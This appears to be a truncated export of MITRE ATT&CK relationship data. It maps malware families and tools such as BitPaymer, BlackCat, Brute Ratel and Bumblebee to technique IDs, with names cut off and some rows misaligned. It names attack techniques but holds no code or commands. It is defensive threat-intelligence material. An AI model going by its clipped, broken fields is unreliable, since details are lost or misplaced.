S0268 Bisonal malware-- software uses T1082 System Inf attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1016 System Netattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1124 System Timattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1497.003Time Basedattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1497 Virtualiza attack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1059.005Visual Basiattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1071.001Web Protocattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1059.003Windows Cattack-pat technique [Bisonal](h
S0268 Bisonal malware-- software uses T1543.003Windows Se attack-pat technique [Bisonal](h
S0570 BitPaymer malware--fsoftware uses T1548.002Bypass Useattack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1486 Data Encryattack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1027.013Encrypted/attack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1480 Execution attack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1490 Inhibit Sy attack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1087.001Local Acco attack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1112 Modify Regattack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1564.004NTFS File Aattack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1106 Native API attack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1135 Network Shattack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1012 Query Regiattack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1547.001Registry Ruattack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1018 Remote Sysattack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1007 System Serattack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1070.006Timestompattack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1134.001Token Impeattack-pat technique [BitPaymer]
S0570 BitPaymer malware--fsoftware uses T1222.001Windows Fiattack-pat technique [BitPaymer
S0570 BitPaymer malware--fsoftware uses T1543.003Windows Se attack-pat technique [BitPaymer]
S1070 Black Bastamalware-- software uses T1027.001Binary Padattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1553.002Code Signi attack-pat technique The [Black
S1070 Black Bastamalware-- software uses T1486 Data Encryattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1622 Debugger Eattack-pat technique The [Black
S1070 Black Bastamalware-- software uses T1083 File and Di attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1490 Inhibit Sy attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1491.001Internal D attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1222.002Linux and M attack-pat technique The [Black
S1070 Black Bastamalware-- software uses T1204.002Malicious Fattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1036.004Masquerade attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1036.005Match Legiattack-pat technique The [Black
S1070 Black Bastamalware-- software uses T1112 Modify Regattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1480.002Mutual Excattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1106 Native API attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1059.001PowerShellattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1018 Remote Sysattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1562.009Safe Modeattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1497.001System Cheattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1082 System Inf attack-pat technique [Black Bas
S1070 Black Bastamalware-- software uses T1007 System Serattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1497 Virtualiza attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1059.003Windows Cattack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1047 Windows M attack-pat technique [Black Bast
S1070 Black Bastamalware-- software uses T1543.003Windows Se attack-pat technique [Black Bast
S1068 BlackCat malware-- software uses T1134 Access Tokattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1548.002Bypass Useattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1070.001Clear Windattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1486 Data Encryattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1561.001Disk Conteattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1087.002Domain Acattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1069.002Domain Grattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1083 File and Di attack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1490 Inhibit Sy attack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1491.001Internal D attack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1570 Lateral Tooattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1112 Modify Regattack-pat technique [BlackCat]
S1068 BlackCat malware-- software uses T1135 Network Shattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1018 Remote Sysattack-pat technique [BlackCat]
S1068 BlackCat malware-- software uses T1489 Service Stoattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1082 System Inf attack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1033 System Own attack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1059.003Windows Cattack-pat technique [BlackCat]
S1068 BlackCat malware-- software uses T1222.001Windows Fiattack-pat technique [BlackCat](
S1068 BlackCat malware-- software uses T1047 Windows M attack-pat technique [BlackCat]
S0089 BlackEnergmalware--5software uses T1548.002Bypass Useattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1070.001Clear Windattack-pat technique The [BlackE
S0089 BlackEnergmalware--5software uses T1553.006Code Signinattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1552.001Credentialsattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1555.003Credential attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1485 Data Destrattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1055.001Dynamic-linattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1008 Fallback C attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1083 File and Di attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1070 Indicator attack-pat technique [BlackEner
S0089 BlackEnergmalware--5software uses T1056.001Keyloggingattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1046 Network Seattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1120 Peripheral attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1057 Process Di attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1547.001Registry Ruattack-pat technique The [BlackE
S0089 BlackEnergmalware--5software uses T1021.002SMB/Windo attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1113 Screen Capattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1574.010Services F attack-pat technique One variant
S0089 BlackEnergmalware--5software uses T1547.009Shortcut Mattack-pat technique The [BlackE
S0089 BlackEnergmalware--5software uses T1082 System Inf attack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1016 System Netattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1049 System Netattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1071.001Web Protocattack-pat technique [BlackEnerg
S0089 BlackEnergmalware--5software uses T1047 Windows M attack-pat technique A [BlackEne
S0089 BlackEnergmalware--5software uses T1543.003Windows Se attack-pat technique One variant
S0564 BlackMoul malware-- software uses T1005 Data from attack-pat technique [BlackMoul
S0564 BlackMoul malware-- software uses T1083 File and Di attack-pat technique [BlackMould
S0564 BlackMoul malware-- software uses T1105 Ingress Tooattack-pat technique [BlackMould
S0564 BlackMoul malware-- software uses T1082 System Inf attack-pat technique [BlackMoul
S0564 BlackMoul malware-- software uses T1071.001Web Protocattack-pat technique [BlackMoul
S0564 BlackMoul malware-- software uses T1059.003Windows Cattack-pat technique [BlackMoul
S0521 BloodHountool--066bsoftware uses T1560 Archive Coattack-pat technique [BloodHound
S0521 BloodHountool--066bsoftware uses T1087.002Domain Acattack-pat technique [BloodHound
S0521 BloodHountool--066bsoftware uses T1069.002Domain Grattack-pat technique [BloodHoun
S0521 BloodHountool--066bsoftware uses T1482 Domain Truattack-pat technique [BloodHound
S0521 BloodHountool--066bsoftware uses T1615 Group Poliattack-pat technique [BloodHound
S0521 BloodHountool--066bsoftware uses T1087.001Local Acco attack-pat technique [BloodHound
S0521 BloodHountool--066bsoftware uses T1069.001Local Grouattack-pat technique [BloodHoun
S0521 BloodHountool--066bsoftware uses T1106 Native API attack-pat technique [BloodHound
S0521 BloodHountool--066bsoftware uses T1201 Password Pattack-pat technique [BloodHoun
S0521 BloodHountool--066bsoftware uses T1059.001PowerShellattack-pat technique [BloodHoun
S0521 BloodHountool--066bsoftware uses T1018 Remote Sysattack-pat technique [BloodHoun
S0521 BloodHountool--066bsoftware uses T1033 System Own attack-pat technique [BloodHound
S0486 Bonadan malware-- software uses T1059 Command attack-pat
an technique [Bonadan](h
S0486 Bonadan malware-- software uses T1554 Compromise attack-pat technique [Bonadan](
S0486 Bonadan malware-- software uses T1496.001Compute Hiattack-pat technique [Bonadan](
S0486 Bonadan malware-- software uses T1105 Ingress Tooattack-pat technique [Bonadan](
S0486 Bonadan malware-- software uses T1057 Process Di attack-pat technique [Bonadan](
S0486 Bonadan malware-- software uses T1573.001Symmetric attack-pat technique [Bonadan](
S0486 Bonadan malware-- software uses T1082 System Inf attack-pat technique [Bonadan](
S0486 Bonadan malware-- software uses T1016 System Netattack-pat technique [Bonadan](h
S0486 Bonadan malware-- software uses T1033 System Own attack-pat technique [Bonadan](
S0635 BoomBox malware--csoftware uses T1140 Deobfuscatattack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1087.002Domain Acattack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1087.003Email Accoattack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1480 Execution attack-pat technique [BoomBox](h
S0635 BoomBox malware--csoftware uses T1567.002Exfiltratio attack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1083 File and Di attack-pat technique [BoomBox](h
S0635 BoomBox malware--csoftware uses T1105 Ingress Tooattack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1204.002Malicious Fattack-pat technique [BoomBox](h
S0635 BoomBox malware--csoftware uses T1036 Masqueradattack-pat technique [BoomBox](h
S0635 BoomBox malware--csoftware uses T1027 Obfuscatedattack-pat technique [BoomBox](h
S0635 BoomBox malware--csoftware uses T1547.001Registry Ruattack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1218.011Rundll32 attack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1082 System Inf attack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1033 System Own attack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1071.001Web Protocattack-pat technique [BoomBox](
S0635 BoomBox malware--csoftware uses T1102 Web Servicattack-pat technique [BoomBox](
S0651 BoxCaon malware-- software uses T1102.002Bidirectio attack-pat technique [BoxCaon](
S0651 BoxCaon malware-- software uses T1547 Boot or Lo attack-pat technique [BoxCaon](
S0651 BoxCaon malware-- software uses T1005 Data from attack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1041 Exfiltratio attack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1567.002Exfiltratio attack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1083 File and Di attack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1105 Ingress Tooattack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1074.001Local Data attack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1106 Native API attack-pat technique [BoxCaon](
S0651 BoxCaon malware-- software uses T1027 Obfuscatedattack-pat technique [BoxCaon](h
S0651 BoxCaon malware-- software uses T1016 System Netattack-pat technique [BoxCaon](
S0651 BoxCaon malware-- software uses T1059.003Windows Cattack-pat technique [BoxCaon](
S0252 Brave Prin malware-- software uses T1562.001Disable or attack-pat technique [Brave Pri
S0252 Brave Prin malware-- software uses T1048.003Exfiltrati attack-pat technique Some [Brave
S0252 Brave Prin malware-- software uses T1083 File and Di attack-pat technique [Brave Prin
S0252 Brave Prin malware-- software uses T1057 Process Di attack-pat technique [Brave Prin
S0252 Brave Prin malware-- software uses T1012 Query Regiattack-pat technique [Brave Prin
S0252 Brave Prin malware-- software uses T1082 System Inf attack-pat technique [Brave Prin
S0252 Brave Prin malware-- software uses T1016 System Netattack-pat technique [Brave Prin
S0204 Briba malware-- software uses T1105 Ingress Tooattack-pat technique [Briba](htt
S0204 Briba malware-- software uses T1547.001Registry Ruattack-pat technique [Briba](htt
S0204 Briba malware-- software uses T1218.011Rundll32 attack-pat technique [Briba](htt
S0204 Briba malware-- software uses T1543.003Windows Se attack-pat technique [Briba](htt
S1063 Brute Rateltool--75d8software uses T1574.001DLL Searchattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1574.002DLL Side-L attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1071.004DNS attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1005 Data from attack-pat technique [Brute Ratel C4](https://attac
S1063 Brute Rateltool--75d8software uses T1140 Deobfuscatattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1087.002Domain Acattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1069.002Domain Grattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1482 Domain Truattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1027.007Dynamic APattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1562.006Indicator Battack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1105 Ingress Tooattack-pat technique [Brute Ratel C4](https://attac
S1063 Brute Rateltool--75d8software uses T1558.003Kerberoastattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1204.002Malicious Fattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1036.008Masquerade attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1036.005Match Legiattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1106 Native API attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1046 Network Seattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1095 Non-Applicattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1027 Obfuscatedattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1055.002Portable Exattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1057 Process Di attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1572 Protocol T attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1620 Reflective attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1021 Remote Serattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1021.002SMB/Windo attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1113 Screen Capattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1518.001Security S attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1569.002Service Ex attack-pat technique [Brute Ratel C4](https://attac
S1063 Brute Rateltool--75d8software uses T1497.003Time Basedattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1071.001Web Protocattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1102 Web Servicattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1059.003Windows Cattack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1047 Windows M attack-pat technique [Brute Rate
S1063 Brute Rateltool--75d8software uses T1021.006Windows Rattack-pat technique [Brute Rate
S1039 Bumblebeemalware-- software uses T1560 Archive Coattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1055.004Asynchronoattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1548.002Bypass Useattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1559.001Componentattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1005 Data from attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1622 Debugger Eattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1140 Deobfuscatattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1055.001Dynamic-linattack-pat technique The [Bumble
S1039 Bumblebeemalware-- software uses T1041 Exfiltratio attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1008 Fallback C attack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1070.004File Deleti attack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1105 Ingress Tooattack-pat technique [Bumblebee
[Bumblebee](https://attack.m
S1039 Bumblebeemalware-- software uses T1204.002Malicious Fattack-pat technique
S1039 Bumblebeemalware-- software uses T1204.001Malicious Lattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1036.005Match Legiattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1106 Native API attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1027 Obfuscatedattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1218.008Odbcconf attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1059.001PowerShellattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1057 Process Di attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1055 Process Injattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1012 Query Regiattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1218.011Rundll32 attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1053.005Scheduled attack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1518.001Security S attack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1129 Shared Moattack-pat technique [Bumblebee](https://attack.m
[Bumblebee
S1039 Bumblebeemalware-- software uses T1566.001Spearphishattack-pat technique
S1039 Bumblebeemalware-- software uses T1566.002Spearphishattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1132.001Standard Eattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1573.001Symmetric attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1497.001System Cheattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1082 System Inf attack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1033 System Own attack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1497.003Time Basedattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1497 Virtualiza attack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1059.005Visual Basiattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1102 Web Servicattack-pat technique [Bumblebee
S1039 Bumblebeemalware-- software uses T1059.003Windows Cattack-pat technique [Bumblebee]
S1039 Bumblebeemalware-- software uses T1047 Windows M attack-pat technique [Bumblebee
S0482 Bundlore malware-- software uses T1059.002AppleScripattack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1176 Browser Exattack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1140 Deobfuscatattack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1562.001Disable or attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1189 Drive-by C attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1048 Exfiltratio attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1056.002GUI Input attack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1564 Hide Artifaattack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1105 Ingress Tooattack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1059.007JavaScript attack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1543.001Launch Ageattack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1543.004Launch Da attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1222.002Linux and M attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1204.002Malicious Fattack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1036.005Match Legiattack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1027 Obfuscatedattack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1057 Process Di attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1059.006Python attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1098.004SSH Authorattack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1518 Software Dattack-pat technique [Bundlore](
S0482 Bundlore malware-- software uses T1082 System Inf attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1059.004Unix Shell attack-pat technique [Bundlore]
S0482 Bundlore malware-- software uses T1071.001Web Protocattack-pat technique [Bundlore]
S0025 CALENDARmalware-- software uses T1102.002Bidirectio attack-pat technique The [CALEN
S0025 CALENDARmalware-- software uses T1059.003Windows Cattack-pat technique [CALENDAR]
S0465 CARROTBAtool--5fc8 software uses T1071.002File Transf attack-pat technique [CARROTBAL
S0465 CARROTBAtool--5fc8 software uses T1105 Ingress Tooattack-pat technique [CARROTBAL
S0465 CARROTBAtool--5fc8 software uses T1204.002Malicious Fattack-pat technique [CARROTBAL
S0465 CARROTBAtool--5fc8 software uses T1027 Obfuscatedattack-pat technique [CARROTBAL
S0462 CARROTBAmalware-- software uses T1027.010Command aOttack-pat technique [CARROTBAT
S0462 CARROTBAmalware-- software uses T1027.013Encrypted/attack-pat technique [CARROTBAT
S0462 CARROTBAmalware-- software uses T1070.004File Deleti attack-pat technique [CARROTBAT
S0462 CARROTBAmalware-- software uses T1105 Ingress Tooattack-pat technique [CARROTBAT
S0462 CARROTBAmalware-- software uses T1082 System Inf attack-pat technique [CARROTBAT
S0462 CARROTBAmalware-- software uses T1059.003Windows Cattack-pat technique [CARROTBAT
S0222 CCBkdr malware--bsoftware uses T1195.002Compromise attack-pat technique [CCBkdr](ht
S0222 CCBkdr malware--bsoftware uses T1568.002Domain Gen attack-pat technique [CCBkdr](ht
S1149 CHIMNEYSmalware-- software uses T1027.001Binary Padattack-pat technique The [CHIMN
S1149 CHIMNEYSmalware-- software uses T1548.002Bypass Useattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1218.003CMSTP attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1115 Clipboard attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1553.002Code Signi attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1005 Data from attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1140 Deobfuscatattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1027.007Dynamic APattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1027.009Embeddedattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1480 Execution attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1041 Exfiltratio attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1083 File and Di attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1105 Ingress Tooattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1056.001Keyloggingattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1074.001Local Data attack-pat technique [CHIMNEYSW
[CHIMNEYSWEEP](https://att
S1149 CHIMNEYSmalware-- software uses T1112 Modify Regattack-pat technique
S1149 CHIMNEYSmalware-- software uses T1106 Native API attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1132.002Non-Standaattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1027 Obfuscatedattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1120 Peripheral attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1059.001PowerShellattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1057 Process Di attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1053.005Scheduled attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1113 Screen Capattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1518.001Security S attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1033 System Own attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1529 System Sh attack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1070.006Timestompattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1059.005Visual Basiattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1071.001Web Protocattack-pat technique [CHIMNEYSW
S1149 CHIMNEYSmalware-- software uses T1102 Web Servicattack-pat technique [CHIMNEYSW
S0023 CHOPSTICKmalware--csoftware uses T1573.002Asymmetricattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1059 Command attack-pat
an technique [CHOPSTICK
S0023 CHOPSTICKmalware--csoftware uses T1092 Communicaattack-pat technique Part of [AP
S0023 CHOPSTICKmalware--csoftware uses T1568.002Domain Gen attack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1008 Fallback C attack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1083 File and Di attack-pat technique An older ve
S0023 CHOPSTICKmalware--csoftware uses T1027.011Fileless St attack-pat technique [CHOPSTICK
S0023 CHOPSTICKmalware--csoftware uses T1105 Ingress Tooattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1090.001Internal Prattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1056.001Keyloggingattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1071.003Mail Protocattack-pat technique Various im
S0023 CHOPSTICKmalware--csoftware uses T1112 Modify Regattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1012 Query Regiattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1091 Replicatio attack-pat technique Part of [AP
S0023 CHOPSTICKmalware--csoftware uses T1113 Screen Capattack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1518.001Security S attack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1573.001Symmetric attack-pat technique [CHOPSTICK
S0023 CHOPSTICKmalware--csoftware uses T1497 Virtualiza attack-pat technique [CHOPSTICK]
S0023 CHOPSTICKmalware--csoftware uses T1071.001Web Protocattack-pat technique Various im
S1105 COATHANGmalware-- software uses T1573.002Asymmetricattack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1140 Deobfuscatattack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1574.006Dynamic Liattack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1190 Exploit Pubattack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1070.004File Deleti attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1083 File and Di attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1564.001Hidden Fileattack-pat technique [COATHANGER
S1105 COATHANGmalware-- software uses T1574 Hijack Exe attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1543.004Launch Da attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1222.002Linux and M attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1095 Non-Applicattack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1027 Obfuscatedattack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1057 Process Di attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1055 Process Injattack-pat technique [COATHANGER
S1105 COATHANGmalware-- software uses T1014 Rootkit attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1027.002Software Pattack-pat technique The first
S1105 COATHANGmalware-- software uses T1059.004Unix Shell attack-pat technique [COATHANGE
S1105 COATHANGmalware-- software uses T1071.001Web Protocattack-pat technique [COATHANGE
S0212 CORALDECmalware-- software uses T1560.001Archive viaattack-pat technique [CORALDECK
S0212 CORALDECmalware-- software uses T1048.003Exfiltrati attack-pat technique [CORALDECK
S0212 CORALDECmalware-- software uses T1083 File and Di attack-pat technique [CORALDECK]
S0137 CORESHELLmalware-- software uses T1027.001Binary Padattack-pat technique [CORESHELL]
